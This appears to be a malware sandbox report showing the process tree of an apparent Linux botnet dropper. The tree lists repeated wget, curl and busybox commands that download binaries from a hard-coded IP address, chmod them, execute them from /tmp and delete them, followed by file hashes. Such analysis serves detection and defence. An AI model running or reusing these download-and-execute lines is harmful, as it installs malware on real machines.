-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:933
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:939
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:945
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:951
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:957
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:963
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:969
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:972
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97